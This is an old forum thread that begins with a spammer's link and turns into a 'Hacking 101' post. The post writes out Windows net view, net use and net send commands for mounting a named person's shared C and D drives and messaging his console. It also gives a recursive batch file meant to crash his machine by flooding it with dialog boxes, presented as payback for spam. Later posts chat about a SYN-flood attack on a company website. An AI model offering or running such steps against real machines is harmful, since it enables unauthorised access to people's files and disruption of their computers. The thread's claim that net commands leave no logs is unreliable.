check this site out...

Nobody reply (after this, of course :)
Let the thread sink into the darkness of oblivion.

<font color=blue>Quarter pounder inside</font color=blue>
<font color=red>Change the Sig of the Week!!!</font color=red>
tom should start a special advertisement group, that everybody could skip!


<font color=blue>die-hard fans don't have heat-sinks!</font color=blue>
Hacking 101 - DO NOT DO BAD THINGS WITH THIS INFO TOWARDS I am using him as a working example and maybe he can fix his security holes now that they have been pointed out.

This guy suxors for security, I can use him as a example on how to dissassemble someone who spams or uses pop-ups that really piss you off.

ping to get IP

net send Hi! (sends Hi! to his console)

Net view \\ (shows his shared drives =P)

net use * \\\CDRIVE (mounts his c drive)
net use * \\\DDRIVE (mounts his d drive)

Ok, not that you can send messages to his console and mount his drives have fun with him

If you make directories with .lpt or .com1 or .aux they are undeletable

Ok, you got the basics, now lets go make a batch file named popups.bat

REM This file is to crash machine serving pop ups.
net send VICTIMS_IP I hate popups!
call popups.bat
REM end of file

run the batch file. it will send "I hate popups" to the console stacking dialog boxes one on top of each other.

If you have trouble mounting drives, remove your administrator password.

There is no logging for net commands, only way to detect someone is to use the command net users.
do you think i really care? my website is hosted.. so go ahead and attack my hosting company... not my problem.. they will just trace it back to you..
Not attacking your hosting site, they are morons though =)

I sent them a message that their security sucked and how to fix it.

Be thankfull that someone pointed that out rather than hostile attack on it. I hate spam and popups even worse.
As a side note, my company's website was DoSed yesterday (won't tell you what company I work for, even though almost none of you have heard of it, probably :)

A student at MIT apparently decided to send some SYN packets from a spoofed IP. Jackass. He probably lost his scholarship. Doubt they kicked him out of school, though.

Our webserver is stored at a remote location, we're pretty pissed that they let something like that happen.

<font color=blue>Quarter pounder inside</font color=blue>
<font color=red>Change the Sig of the Week!!!</font color=red>
Like I said, it's maintained by a separate company, so it's not our fault :)

Anyhow, we've since found out it was a grad student at MIT. We've warned them that we have copyrighted material on our server and it's illegal to view that information (besides obviously being illegal to hack our server, of course).

We'll see if MIT cares or not...

<font color=blue>Quarter pounder inside</font color=blue>
<font color=red>Change the Sig of the Week!!!</font color=red>
(stranger )
08/14/01 10:30 AM
check this site out...

sorry to spam you guys... i won't do it again..

stranger )
08/14/01 12:40 PM
come one.. come all

He's a lying bastard! Everyone buy from him! :)

<font color=blue>Quarter pounder inside</font color=blue>
<font color=red>Change the Sig of the Week!!!</font color=red>